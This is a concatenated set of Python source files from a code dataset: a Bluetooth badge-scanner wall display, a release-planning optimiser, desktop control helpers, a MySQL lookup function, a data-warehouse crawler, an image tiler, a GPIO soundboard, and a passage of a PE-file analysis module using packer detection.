CDLL(btlib, use_errno=True)\n\n dev_id = self.bluez.hci_get_route(None)\n \n self.sock = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI)\n if not self.sock:\n print(\"Failed to open Bluetooth\")\n sys.exit(1)\n\n self.sock.bind((dev_id,))\n\n err = self.bluez.hci_le_set_scan_parameters(self.sock.fileno(), 0, 0x10, 0x10, 0, 0, 1000)\n if err < 0:\n raise Exception(\"Set scan parameters failed\")\n # occurs when scanning is still enabled from previous call\n\n # allows LE advertising events\n hci_filter = struct.pack(\n \"= 1000:\n self._writeout()\n self.intercepts = []\n self.count = 0\n\n def closeout(self):\n self._writeout()\n\n\nclass LiveDisplay:\n def __init__(self, master):\n self.live_canvas = Canvas(master, width=370, height=505, bg=tablebg, borderwidth=0, highlightthickness=0)\n self.live_text = self.live_canvas.create_text(tmargin, tmargin, anchor=NW, text=\"\", font=(\"Droid Sans Mono\", 32))\n self.live_canvas.place(x=screenw-margin, y=screenh-margin, anchor=SE)\n self.lines = deque()\n\n def intercept(self, badge):\n line = \"%s %s\" % (badge[BADGE_ID], badge[BADGE_NAME])\n self.logtext(line)\n\n def logtext(self, text):\n if len(self.lines) >= 10:\n self.lines.popleft()\n self.lines.append(text)\n self.live_canvas.itemconfigure(self.live_text, text=\"\\n\".join(self.lines))\n\n\nclass SmoothScroller:\n def __init__(self, master, width, height, x, y, wait):\n self.master = master\n self.wait = wait * wait_factor\n self.height = height\n self.canvas = Canvas(master, width=width, height=height, bg=tablebg, borderwidth=0, highlightthickness=0)\n self.text = self.canvas.create_text(tmargin, tmargin, anchor=NW, text=\"\", font=(\"Droid Sans Mono\", MAIN_DISPLAY_FONTSIZE))\n self.canvas.place(x=x, y=y, anchor=NW)\n self.scroll()\n\n def scroll(self):\n left, top, right, bottom = self.canvas.bbox(ALL)\n if bottom > self.height:\n self.canvas.move(self.text, 0, -wait_factor)\n elif top < 0:\n if bottom > 0:\n self.canvas.move(self.text, 0, -wait_factor)\n else:\n self.canvas.move(self.text, 0, -top + self.height)\n self.master.after(self.wait, self.scroll)\n\n\nclass NamesDisplay (SmoothScroller):\n def __init__(self, master):\n SmoothScroller.__init__(self, master, width=265, height=680, x=margin+1080+margin, y=350, wait=20)\n self.lines = deque()\n self.scroll()\n\n def intercept(self, badge):\n if badge[BADGE_NAME] not in self.lines:\n # print(\"BADGE NAME .%s.\" % badge[BADGE_NAME])\n # line = badge[BADGE_NAME] + \" \"*(8-len(badge[BADGE_NAME]))\n # print(\"LINE .%s.\" % line)\n self.lines.append(badge[BADGE_NAME])\n self.canvas.itemconfigure(self.text, text=\"\\n\".join(self.lines))\n\n\nclass BadgeDisplay (SmoothScroller):\n def __init__(self, master):\n self.master = master\n self.badges = {}\n SmoothScroller.__init__(self, master, width=1080, height=750, x=margin, y=275, wait=30)\n self.lines = deque()\n self.scroll()\n self.updater()\n\n def updater(self):\n self.update_display()\n self.master.after(5000, self.updater)\n\n def format_time_ago(self, t, timenow):\n age = timenow - t\n if age < 5.0:\n return \" just now\"\n else:\n hours = int(age / (60*60))\n age -= hours * 60*60\n minutes = int(age / 60)\n age -= minutes * 60\n secs = int(age/5) * 5\n if hours > 0:\n return \"%3d:%02d:%02d\" % (hours, minutes, secs)\n else:\n return \" %2d:%02d\" % (minutes, secs)\n\n def update_display(self):\n timenow = time.time()\n self.lines = []\n for b in sorted(self.badges.values(), key=lambda badge: badge[BADGE_CSCORE], reverse=True):\n if BADGE_ID_FAKED in b:\n flag = \"*\"\n else:\n flag = \" \"\n ident = b[BADGE_ID]\n name = b[BADGE_NAME]\n typ = b[BADGE_TYPE]\n if typ == BADGE_TYPE_JOCO or typ == BADGE_TYPE_TRANSIO_TMP or typ == BADGE_TYPE_TRANSIO:\n if b[BADGE_CSCORE] >= 1000:\n score = \"%2d,%03d\" % (b[BADGE_CSCORE]/1000, b[BADGE_CSCORE] % 1000)\n else:\n score = \" %5d\" % b[BADGE_CSCORE]\n if b[BADGE_CTRINKET] != 0: # claims to be eligible for a trinket\n flag = \"!\"\n else:\n score = \" N/A\"\n t = self.format_time_ago(b[BADGE_TIME], timenow)\n line = flag + \" \" + ident + \" \" + name + \" \"*(8-len(name)) + \" \" + score + \" \" + t\n self.lines.append(line)\n self.canvas.itemconfigure(self.text, text=\"\\n\".join(self.lines))\n\n def intercept(self, badge):\n if badge[BADGE_ADDR] not in self.badges:\n badge[BADGE_IDS] = [badge[BADGE_ID]]\n badge[BADGE_NAMES] = [badge[BADGE_NAME]]\n badge[BADGE_YEARS] = [badge[BADGE_YEAR]]\n badge[BADGE_CNT] = 1\n self.badges[badge[BADGE_ADDR]] = badge\n # do not call self.update_display()\n\n else:\n b = self.badges[badge[BADGE_ADDR]]\n b[BADGE_CNT] += 1\n b[BADGE_NAME] = badge[BADGE_NAME]\n b[BADGE_ID] = badge[BADGE_ID]\n b[BADGE_TIME] = badge[BADGE_TIME]\n b[BADGE_YEAR] = badge[BADGE_YEAR]\n if badge[BADGE_NAME] not in b[BADGE_NAMES]:\n b[BADGE_NAMES].append(badge[BADGE_NAME])\n if badge[BADGE_ID] not in b[BADGE_IDS]:\n b[BADGE_IDS].append(badge[BADGE_ID])\n if badge[BADGE_YEAR] not in b[BADGE_YEARS]:\n b[BADGE_YEARS].append(badge[BADGE_YEAR])\n if len(b[BADGE_IDS]) > 1:\n b[BADGE_ID_FAKED] = True\n b[BADGE_CTRINKET] = badge[BADGE_CTRINKET]\n b[BADGE_CSCORE] = badge[BADGE_CSCORE]\n # do not call self.update_display()\n\n\nclass TermDisplay:\n def __init__(self, master):\n self.term_canvas = Canvas(master, width=1200, height=750, bg=termbg, borderwidth=0, highlightthickness=0)\n self.term_text = self.term_canvas.create_text(widemargin, widemargin, anchor=NW, text=\"\", font=(\"Droid Sans Mono\", 48))\n self.lines = deque()\n self.showing = False\n \n def show(self):\n if not self.showing:\n self.term_canvas.place(x=1920/2, y=1024/2, anchor=CENTER)\n self.showing = True\n\n def hide(self):\n if self.showing:\n self.term_canvas.place_forget()\n self.showing = False\n \n def logtext(self, text):\n if len(self.lines) >= 14:\n self.lines.popleft()\n self.lines.append(text)\n self.term_canvas.itemconfigure(self.term_text, text=\"\\n\".join(self.lines))\n\n def clear(self):\n self.lines.clear()\n\nclass BadgeDevice(gatt.Device):\n def connect_succeeded(self):\n super().connect_succeeded()\n live_display.logtext(\"Connected\")\n\n def connect_failed(self, error):\n super().connect_failed(error)\n live_display.logtext(\"Failed\")\n\n def disconnect_succeeded(self):\n super().disconnect_succeeded()\n live_display.logtext(\"Disconnected\")\n\n def services_resolved(self):\n super().services_resolved()\n score_service = next(\n s for s in self.services\n if s.uuid == '0000bd7e-0000-1000-8000-00805f9b34fb')\n encrypted_score = next(\n c for c in score_service.characteristics\n if c.uuid == '00002e15-0000-1000-8000-00805f9b34fb')\n encrypted_score.read_value()\n live_display.logtext(\"Reading\")\n\n def characteristic_value_update(self, characteristic, value):\n result = joco_crypto.eval_score_characteristic(value)\n if result is None:\n live_display.logtext(\"Invalid\")\n else:\n live_display.logtext(\"%s %d %d\" % result)\n device.disconnect()\n manager.stop()\n\n def characteristic_read_value_failed(self, characteristic, error):\n live_display.logtext(\"Read failed.\")\n\n\nmargin = 50\ntmargin = 5\nwidemargin = 40\nscreenh = 1080\nscreenw = 1920\nbgcolor = \"#ffe298\"\ntablebg = \"#eed288\"\ntermbg = \"#00ff00\"\n\nroot = Tk()\nroot.overrideredirect(True)\nroot.overrideredirect(False)\nroot.attributes(\"-fullscreen\", True)\nroot.configure(background=bgcolor)\n\nheading = Label(root, text=\"Trans-Ionospheric\", bg=bgcolor, font=(\"Droid Sans Mono\", 100))\nheading.place(x=margin, y=margin-40, anchor=NW)\ncredit = Label(root, text=\"Brought to you by Phase4Ground with thanks to AND!XOR\",\n fg=\"#888888\", bg=bgcolor, font=(\"Droid Sans Mono\", 9))\ncredit.place(x=margin+18, y=170, anchor=NW)\nbadges_label = Label(root, text=\" ID Name Score Seen\", bg=bgcolor, font=(\"Droid Sans Mono\", MAIN_DISPLAY_FONTSIZE))\nbadges_label.place(x=margin, y=210, anchor=NW)\nnames_label = Label(root, text=\"Names\", bg=bgcolor, font=(\"Droid Sans Mono\", 50))\nnames_label.place(x=margin+1085+margin, y=265, anchor=NW)\nlive_label = Label(root, text=\"Intercepts\", bg=bgcolor, font=(\"Droid Sans Mono\", 44))\nlive_label.place(x=margin+912+margin+435+margin, y=460, anchor=NW)\n\nimg = ImageTk.PhotoImage(Image.open(\"walloftio.png\").convert(\"RGBA\"))\nphoto_panel = Label(root, image=img, borderwidth=0, bg=bgcolor)\nphoto_panel.place(x=screenw-margin/2, y=margin/2, anchor=NE)\n\nbadge_display = BadgeDisplay(root)\nnames_display = NamesDisplay(root)\nlive_display = LiveDisplay(root)\nterm_display = TermDisplay(root)\nlog = Logger()\n\n\ndef click_callback(event):\n live_display.logtext(\"Click!\")\n term_display.show()\n term_display.logtext(\"random %d\" % random.randint(1,10000))\n #manager = gatt.DeviceManager(adapter_name='hci1') # separate adapter\n #device = BadgeDevice(mac_address='e2:15:e5:53:f2:0c', manager=manager)\n #device.connect()\n #manager.run()\n live_display.logtext(\"Done.\")\n\ndef rclick_callback(event):\n live_display.logtext(\"Right click!\")\n term_display.hide()\n term_display.clear()\n\nphoto_panel.bind(\"\", click_callback)\nphoto_panel.bind(\"\", rclick_callback)\n \ndef badgeParse(data):\n \"\"\" If the advertisement data contains a valid badge beacon,\n return the parsed badge data structure. If not, return None.\"\"\"\n\n badge_address = ':'.join('{0:02x}'.format(x) for x in data[12:6:-1])\n\n index = 14\n badge = False\n badge_name = None\n dc26 = False\n while (index < len(data)-1):\n packet_len = data[index]\n packet_type = data[index+1]\n packet_payload = data[index+2:index+2+packet_len-1]\n index += packet_len+1\n if packet_type == 0x01: # Flags\n if int(packet_payload[0]) != 0x06:\n badge = False\n elif packet_type == 0x09: # Local Name\n badge_name = packet_payload.decode(\"utf-8\")\n badge_name = badge_name[0:8]\n elif packet_type == 0x19: # Appearance\n badge_year = \"%02X%d\" % (packet_payload[0], packet_payload[1])\n if packet_payload[1] == 0x26:\n dc26 = True\n elif packet_payload[1] == 0x19:\n dc26 = False\n else:\n badge_year = None\n elif packet_type == 0xFF: # Manufacturer Specific Data\n badge_type = (packet_payload[1] << 8) + packet_payload[0]\n if badge_type == BADGE_TYPE_JOCO or badge_type == BADGE_TYPE_TRANSIO_TMP:\n badge_id = \"%02X%02X\" % (packet_payload[3], packet_payload[2])\n badge_claimed_score = (packet_payload[4] << 8) + packet_payload[5]\n badge_claimed_trinket = badge_claimed_score & 0x8000\n badge_claimed_score = badge_claimed_score & 0x7FFF\n badge = True\n elif badge_type == BADGE_TYPE_TRANSIO:\n badge_id = \"%02X%02X\" % (packet_payload[4], packet_payload[3])\n badge_claimed_trinket = 0\n badge_claimed_score = (packet_payload[6] << 8) + packet_payload[7]\n badge = True\n elif badge_type == BADGE_TYPE_ANDNXOR:\n if dc26:\n badge_id_offset = 3\n else:\n badge_id_offset = 2\n badge_id = \"%02X%02X\" % (packet_payload[badge_id_offset+1], packet_payload[badge_id_offset])\n badge_claimed_trinket = 0\n badge_claimed_score = -1 # so it always sorts below JoCo badges\n badge = True\n else:\n badge_id = \"????\"\n badge_claimed_trinket = 0\n badge_claimed_score = -2\n badge_year = \"DCxx\"\n badge = True\n\n if badge and badge_name is not None and badge_year is not None:\n return {BADGE_ADDR: badge_address,\n BADGE_ID: badge_id,\n BADGE_NAME: badge_name,\n BADGE_YEAR: badge_year,\n BADGE_CTRINKET: badge_claimed_trinket,\n BADGE_CSCORE: badge_claimed_score,\n BADGE_TYPE: badge_type}\n else:\n return None\n\n\ndef processAdvertisement(cept):\n timestamp, data = cept\n badge = badgeParse(data)\n if badge is not None:\n badge[BADGE_TIME] = timestamp\n live_display.intercept(badge)\n names_display.intercept(badge)\n badge_display.intercept(badge)\n log.intercept(cept)\n\n\ndef signal_handler(signal, frame):\n bt.stop()\n log.closeout()\n root.quit()\n\n\ndef btPoller():\n while True:\n try:\n intercept = btQueue.pop()\n processAdvertisement(intercept)\n\n except IndexError:\n break\n\n root.after(100, btPoller)\n\n\ndef terminal_thread():\n global termsocket, term_display\n while True:\n (sock, address) = termsocket.accept() # blocking\n term_display.show()\n stuff = sock.recv(512)\n while len(stuff) != 0:\n for line in stuff.decode('ascii').splitlines():\n term_display.logtext(line)\n stuff = sock.recv(512)\n term_display.hide()\n term_display.clear()\n\n\ntermsocket = socket(AF_INET, SOCK_STREAM)\ntermsocket.bind(termaddr)\ntermsocket.listen(5)\ntermthread = threading.Thread(target=terminal_thread)\ntermthread.start()\n\nbtQueue = deque(maxlen=1000)\nbt = BTAdapter(root, btQueue)\nbt.start()\nsignal.signal(signal.SIGINT, signal_handler)\nbtPoller()\nroot.mainloop()\n","sub_path":"walloftio.py","file_name":"walloftio.py","file_ext":"py","file_size_in_byte":19140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"107420629","text":"from platypus import NSGAII, Problem, Integer\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\n\nclass Customer:\n def __init__(self, weighting, requirements):\n self.weighting = weighting\n self.requirements = requirements\n\n\nclass Requirement:\n def __init__(self, id, value, cost):\n self.id = id\n self.value = value\n self.cost = cost\n\n\nclass ReleaseProblem(Problem):\n def __init__(self, requirements, budget):\n super(ReleaseProblem, self).__init__(len(requirements), 2)\n self.requirements = requirements\n self.types[:] = Integer(0, 1)\n self.constraints[:] = '<=' + str(budget)\n self.directions[0] = self.MAXIMIZE\n self.directions[1] = self.MINIMIZE\n\n max_value = -1\n max_cost = -1\n\n for req in self.requirements:\n if req.value > max_value:\n max_value = req.value\n if req.cost > max_cost:\n max_cost = req.cost\n\n for req in self.requirements:\n req.value = req.value / max_value\n req.cost = req.cost / max_cost\n\n def evaluate(self, solution):\n sum_value = 0\n sum_cost = 0\n\n for i in range(len(solution.variables) - 1):\n if solution.variables[i] == 1:\n sum_value += solution.problem.requirements[i].value\n sum_cost += solution.problem.requirements[i].cost\n\n solution.objectives[:] = [sum_value, sum_cost]\n solution.constraints[:] = sum_cost\n solution.evaluated = True\n\n\nclass SingleObjReleaseProblem(Problem):\n def __init__(self, requirements, budget, weight):\n super(SingleObjReleaseProblem, self).__init__(len(requirements), 1, 1)\n self.requirements = requirements\n self.types[:] = Integer(0, 1)\n self.constraints[:] = '<=' + str(budget)\n self.directions[0] = self.MAXIMIZE\n self.weight = weight\n\n max_value = -1\n max_cost = -1\n\n for req in self.requirements:\n if req.value > max_value:\n max_value = req.value\n if req.cost > max_cost:\n max_cost = req.cost\n\n for req in self.requirements:\n req.value = req.value / max_value\n req.cost = req.cost / max_cost\n\n def evaluate(self, solution):\n sum_value = 0\n sum_cost = 0\n\n for i in range(len(solution.variables) - 1):\n if solution.variables[i] == 1:\n sum_value += solution.problem.requirements[i].value\n sum_cost += solution.problem.requirements[i].cost\n\n solution.objectives = [(self.weight * sum_value) - ((1 - self.weight) * sum_cost)]\n solution.constraints[:] = sum_cost\n solution.evaluated = True\n\n\n# Optimise for the benefit given by a requirement vs. the cost\ndef multi_objective(requirements, budget):\n problem = ReleaseProblem(requirements, budget * sum(req.cost for req in requirements))\n alg = NSGAII(problem)\n alg.run(10000)\n\n plt.scatter([s.objectives[0] for s in alg.result],\n [s.objectives[1] for s in alg.result])\n plt.xlim([min(s.objectives[0] for s in alg.result), max(s.objectives[0] for s in alg.result)])\n plt.ylim([max(s.objectives[1] for s in alg.result), min(s.objectives[1] for s in alg.result)])\n plt.xlabel(\"Value\")\n plt.ylabel(\"Cost\")\n plt.show()\n return alg.result\n\n\n# Optimise for a single objective calculated from the benefit given by a requirement and the cost, at multiple\n# weightings for benefit and cost.\ndef single_objective(requirements, budget):\n weights = np.arange(0.1, 1, 0.05)\n results = []\n\n for weight in weights:\n problem = SingleObjReleaseProblem(requirements, budget * sum(req.cost for req in requirements), weight)\n alg = NSGAII(problem)\n alg.run(10000)\n\n results.append(alg.result[0:10])\n\n cost_value_list = []\n for result_list in results:\n for result in result_list:\n sum_value = 0\n sum_cost = 0\n\n for i in range(0, len(result.variables) - 1):\n if result.variables[i][0]:\n sum_value += requirements[i].value\n sum_cost += requirements[i].cost\n cost_value_list.append([sum_value, sum_cost])\n\n plt.scatter([r[0] for r in cost_value_list], [r[1] for r in cost_value_list])\n plt.xlim([min(r[0] for r in cost_value_list) - 1, max(r[0] for r in cost_value_list) + 1])\n plt.ylim([max(r[1] for r in cost_value_list) + 1, min(r[1] for r in cost_value_list) - 1])\n plt.xlabel(\"Value\")\n plt.ylabel(\"Cost\")\n plt.show()\n return results\n\n\n# Randomly select and evaluate solutions for n iterations, keeping the best.\ndef random_selection(requirements, budget):\n number_iterations = 100\n results = []\n\n for i in range(number_iterations):\n problem = ReleaseProblem(requirements, budget * sum(req.cost for req in requirements))\n alg = NSGAII(problem)\n alg.run(1)\n\n results.append(alg.result[0:10])\n\n cost_value_list = []\n for result_list in results:\n for result in result_list:\n sum_value = 0\n sum_cost = 0\n\n for i in range(0, len(result.variables) - 1):\n if result.variables[i][0]:\n sum_value += requirements[i].value\n sum_cost += requirements[i].cost\n cost_value_list.append([sum_value, sum_cost])\n\n plt.scatter([r[0] for r in cost_value_list], [r[1] for r in cost_value_list])\n plt.xlim([min(r[0] for r in cost_value_list) - 1, max(r[0] for r in cost_value_list) + 1])\n plt.ylim([max(r[1] for r in cost_value_list) + 1, min(r[1] for r in cost_value_list) - 1])\n plt.xlabel(\"Value\")\n plt.ylabel(\"Cost\")\n plt.show()\n return results\n\n\nif __name__ == '__main__':\n # Get the customers and requirements from the files\n customers = []\n costs = []\n requirements = []\n\n budget = 0.5\n\n with open('test/realistic-nrp/nrp-e1-customers') as customer_file:\n for line in customer_file:\n line_list = line.split()\n\n customers.append(Customer(int(line_list[0]), line_list[2:]))\n\n with open('test/realistic-nrp/nrp-e1-requirements') as requirements_file:\n costs = requirements_file.readline().split()\n\n # Find the maximum value for customer weighting\n max_weight = -1\n for customer in customers:\n if customer.weighting > max_weight:\n max_weight = customer.weighting\n\n # Normalise the weighting for each customer\n for customer in customers:\n customer.weighting = customer.weighting / max_weight\n\n # Get a list of the value and cost of each requirement\n for i in range(1, len(costs)):\n value = 0\n\n for customer in customers:\n if str(i) in customer.requirements:\n value += customer.weighting * (1 / (customer.requirements.index(str(i)) + 1))\n\n requirements.append(Requirement(i, value, int(costs[i])))\n\n # Run each of the algorithms\n multi_objective(requirements, budget)\n single_objective(requirements, budget)\n random_selection(requirements, budget)\n","sub_path":"handin_3/src/MultiOpt.py","file_name":"MultiOpt.py","file_ext":"py","file_size_in_byte":7164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"357694672","text":"import alsaaudio\nimport base64\nfrom io import BytesIO\nimport pyscreenshot as ImageGrab\nfrom subprocess import call\nimport webbrowser\n\n\nURL_SCHEMES = ('file://',\n 'ftp://',\n 'gopher://',\n 'hdl://',\n 'http://',\n 'https://',\n 'imap://',\n 'mailto://',\n 'mms://',\n 'news://',\n 'nntp://',\n 'prospero://',\n 'rsync://',\n 'rtsp://',\n 'rtspu://',\n 'sftp://',\n 'shttp://',\n 'sip://',\n 'sips://',\n 'snews://',\n 'svn://',\n 'svn+ssh://',\n 'telnet://',\n 'wais://',\n 'ws://',\n 'wss://')\n\n\ndef url_parser(url):\n if url.startswith(URL_SCHEMES):\n return url\n else:\n return 'https://' + url\n\n\ndef close():\n call([\"pkill\", \"chrome\"])\n\n\ndef web_open(url):\n webbrowser.open(url_parser(url), new=0)\n\n\ndef poweroff():\n call(['systemctl', 'poweroff', '-i'])\n\n\ndef reboot():\n call(['systemctl', 'reboot', '-i'])\n\n\ndef screenshot():\n call(['gnome-screenshot'])\n\n\ndef mute():\n vol = alsaaudio.Mixer()\n vol.setvolume(0)\n\n\ndef volume(volume):\n vol = alsaaudio.Mixer()\n vol.setvolume(volume)\n\n\ndef xdotool_key(keys):\n call(['xdotool', 'key', keys])\n\n\ndef get_volume():\n vol = alsaaudio.Mixer()\n value = vol.getvolume()\n return value[0]\n\n\ndef get_screen():\n screen = ImageGrab.grab()\n buffered_screen = BytesIO()\n screen.save(buffered_screen, format='JPEG')\n return base64.b64encode(buffered_screen.getvalue()).decode('utf-8')\n","sub_path":"tools/system_calls.py","file_name":"system_calls.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"184514903","text":"import secret_info\nimport mysql.connector\n\n\ndef is_there(table_name, bil_sira_1, bil_val_1, bil_sira_2, bil_val_2, double_element = False): \n \n \n mydb = mysql.connector.connect(host=\"localhost\", user=secret_info.MySql.user, passwd=secret_info.MySql.passwd, database=secret_info.MySql.DB)\n \n c = mydb.cursor()\n \n sql = \"SELECT * FROM %s\" % table_name\n \n c.execute(sql)\n \n rows = c.fetchall()\n \n sonuc = False\n \n row_say = 0\n \n for row in rows:\n \n row_say += 1\n \n if str(row[int(bil_sira_1)]) == str(bil_val_1):\n \n sonuc = True # yeni kosulda degisebilir\n \n if double_element == True:\n \n if not str(row[int(bil_sira_2)]) == str(bil_val_2):\n \n sonuc = False\n \n else:\n \n sonuc = True\n \n break\n \n \n \n return sonuc\n \n \n# import value_is_there\n# value_is_there.is_there(\"user_logs\", 0, 1, 1, \"2019-09-02\", True)","sub_path":"apptrogren/value_is_there.py","file_name":"value_is_there.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"569503408","text":"# -*- coding: utf-8 -*-\n\nimport traceback\n\nimport click\n\nimport pp_dwh_crawler as dwh\nfrom pp_dwh_crawler.dbcrawler.parts import TableRegister, TableNameGenerator, TableReader\n\nlogger = dwh.LoggerFactory.create_logger(__name__)\n\nDWF_DB_CRAWLER_CONFIG = dwh.Config(dwh.Environment.APP_CONFIG_ROOT + '/dbcrawler/pp-dwh-dbcrawler.ini')\nCONFIG_ROOT_PATH = DWF_DB_CRAWLER_CONFIG.get(\"config\", \"root_path\")\nTARGET_TABLE_LIST = dwh.Config.get_target_data_name(CONFIG_ROOT_PATH)\n\n\ndef get_result_code(file_info, results):\n return dwh.ResultCode.SUCCESS\n\n\n@click.group()\ndef cli():\n pass\n\n\n@cli.command()\n@click.option('--target-data', required=True, type=click.Choice(TARGET_TABLE_LIST))\n@click.option('--not-dry-run', is_flag=True, default=False)\n@click.option('--overwrite', is_flag=True, default=False)\ndef simple(target_data, not_dry_run, overwrite):\n\n mailer = dwh.Notification(dwh.Environment.DWH_CONFIG)\n packed_message_param = dict(target_data=target_data,\n not_dry_run=not_dry_run,\n overwrite=overwrite)\n result_code = dwh.ResultCode.ERROR\n config = None\n\n try:\n config = dwh.Config(dwh.Environment.APP_CONFIG_ROOT +\n '/dbcrawler/' + target_data + '/' + target_data + '.ini')\n except Exception as e:\n traceback.print_exc()\n mailer.add_mesaage(ERROR_DB_CRAWLER_TEMPLATE,\n packed_message_param.update(exception=e))\n mailer.send()\n return dwh.ResultCode.ERROR\n\n generator = TableNameGenerator(config)\n register = TableRegister(config)\n reader = TableReader(config)\n table_names = []\n\n try:\n table_names = generator.get_available_table(target_data)\n table_info = reader.get_table_info_all(table_names)\n results = register.regsit_all(table_info, not_dry_run, overwrite)\n result_code = get_result_code(table_info, results)\n packed_message_param.update(table_names=table_names, results=results)\n\n except Exception as e:\n traceback.print_exc()\n mailer.add_mesaage(ERROR_DB_CRAWLER_TEMPLATE,\n packed_message_param.update(exception=e, table_name=table_names))\n mailer.send()\n return dwh.ResultCode.ERROR\n\n mailer.add_mesaage(SUCCESS_DB_CRAWLER_TEMPLATE, packed_message_param)\n mailer.send()\n\n return result_code\n\n\nif __name__ == '__main__':\n\n ERROR_DB_CRAWLER_TEMPLATE = dwh.Environment.APP_TEMPLATE_ROOT + '/dbcrawler/error_db_crawler.jinja2'\n SUCCESS_DB_CRAWLER_TEMPLATE = dwh.Environment.APP_TEMPLATE_ROOT + '/dbcrawler/success_db_crawler.jinja2'\n\n cli()\n","sub_path":"pp_dwh_crawler/dbcrawler/pp_dwh_db_crawler.py","file_name":"pp_dwh_db_crawler.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"143753881","text":"import sys, cv2, dlib, time, os\nimport numpy as np\nimport faceBlendCommon as fbc\nfrom random import uniform\nfrom pyhull.delaunay import DelaunayTri\n\n# PREDICTOR_PATH = '../models/shape_predictor_68_face_landmarks.dat'\n# detector = dlib.get_frontal_face_detector()\n# predictor = dlib.shape_predictor(PREDICTOR_PATH)\noutputSize = 600\n\ndef readImagePaths(path, isRandom=False):\n imagePaths = []\n sortedPaths = sorted(os.listdir(path))\n # sortedPaths.remove('.DS_Store')\n length = len(sortedPaths)\n if isRandom:\n indices = np.random.choice(length,8,replace=False)\n else:\n indices = range(0,length)\n for i in indices:\n fileExt = os.path.splitext(sortedPaths[i])[1]\n if fileExt in [\".jpg\", \".jpeg\"]:\n imagePaths.append(os.path.join(path, sortedPaths[i]))\n\n # print(len(imagePaths))\n # print(sortedPaths)\n # print(imagePaths)\n return imagePaths\n\ndef readImages(imagePaths):\n if len(imagePaths) == 0:\n print('No images found with extension jpg or jpeg')\n sys.exit(0)\n\n images = []\n\n for imagePath in imagePaths:\n im = cv2.imread(imagePath)\n if im is None:\n print(\"image:{} not read properly\".format(imagePath))\n else:\n images.append(im)\n\n\n if len(images) == 0:\n print(\"No images found\")\n sys.exit(0)\n\n return images\n\nif __name__ == '__main__' :\n t = time.time()\n\n dirName = \"smoothB\"\n imagePaths = readImagePaths(\"../images/\" + dirName)\n images = readImages(imagePaths)\n\n # for k in range(0, 2):\n istack = []\n for i in range(0, 4):\n jstack = []\n for j in range(0, 6):\n jstack.append(images[4 * j + i])\n # istack.append(np.hstack(jstack))\n # cv2.imshow(\"Face Average\", np.hstack(jstack))\n # cv2.waitKey(0)\n cv2.imwrite(\"../results/\" + dirName + \"_\" + str(i) + \".jpg\", np.hstack(jstack))\n # combined = np.vstack(istack)\n\n # cv2.imwrite(\"../results/\" + dirName + \".jpg\", combined)\n # cv2.destroyAllWindows()\n","sub_path":"week5/compilePictures.py","file_name":"compilePictures.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"335989938","text":"import RPi.GPIO as GPIO\nimport sys as sys\nimport time as time\n\ndef say(msg):\n print(msg);\n sys.stdout.flush()\n\nGPIO.setmode(GPIO.BOARD)\n\n# Set input pins\nbinaryInputPins = [7, 11, 13, 15, 19]\n\n# When voltage changes\ndef my_callback(channel):\n time.sleep(0.01)\n pins = []\n\n for pin in binaryInputPins:\n state = GPIO.input(pin)\n pins.append(str(state))\n\n numStr = ''.join(pins)\n num = int(numStr, 2)\n say('bin:' + str(num))\n\narcadeInputPins = [29, 31, 33]\n\ndef my_arcade_callback(channel):\n time.sleep(0.01)\n pins = []\n state = GPIO.input(channel)\n say('buttonPressed:' + str(channel) + ':' + str(state))\n\n\n\nfor pin in binaryInputPins:\n GPIO.setup(pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.add_event_detect(pin, GPIO.BOTH, callback=my_callback, bouncetime=20)\n\nfor pin in arcadeInputPins:\n GPIO.setup(pin, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.add_event_detect(pin, GPIO.BOTH, callback=my_arcade_callback, bouncetime=20)\n\nwhile(True):\n data = raw_input().strip().split(':')\n\n if data[0] == 'close':\n break\n\nGPIO.cleanup()\n","sub_path":"soundboard.py","file_name":"soundboard.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"291741692","text":"import logging\nimport database\nimport os\nimport magic\nh_magic = magic.open(magic.MAGIC_NONE)\nh_magic.load()\n\nimport pefile\nimport subprocess\nimport zlib\n\nimport utils\nimport shutil\nimport re\nimport simplejson\nimport ssdeep\n\n\nfrom PyPackerDetect import PackerReport\nfrom PyPackerDetect import PEIDDetector\nfrom PyPackerDetect import BadEntryPointSectionDetector\nfrom PyPackerDetect import LowImportCountDetector\nfrom PyPackerDetect import PackerSectionNameDetector\nfrom PyPackerDetect import NonStandardSectionNameDetector\n\n\nPACKER_DETECT_CONFIG = {\n \"LowImportThreshold\": 10,\n \"NonStandardSectionThreshold\": 3,\n \"BadSectionNameThreshold\": 2,\n \"OnlyPEIDEntryPointSignatures\": True,\n # large database has more than 3x as many signatures, but many are for non-packers\n # and will create false positives. we can move signatures from the long list to the short\n # list as needed, though.\n \"UseLargePEIDDatabase\": False,\n\n \"CheckForPEIDSignatures\": True,\n \"CheckForBadEntryPointSections\": True,\n \"CheckForLowImportCount\": True,\n \"CheckForPackerSections\": True,\n \"CheckForNonStandardSections\": True\n}\n\n\nEXT_UNUPXED = \".unupxed\"\n\nLOGFD = open(\"logs/extractors.log\", \"wb\")\n\ndef log(msg):\n LOGFD.write(msg + \"\\n\")\n\n\ndef e_magic(path, file_):\n magic_str = h_magic.file(path)\n logging.debug(\"e_magic: {}\".format(magic_str))\n # if database.record_exists(session, database.Magic, file_):\n # logging.debug(\"e_magic: record exists\")\n \n\n entry = database.Magic(file=file_, magic_str=magic_str)\n # session.add(entry)\n # session.commit()\n return entry\n\n\nCOM_DESC = 14\ndef e_pe(path, file_):\n \"\"\"\n file_id = Column(Integer, ForeignKey(\"file.id\"))\n machine_type = Column(Boolean)\n dotnet = 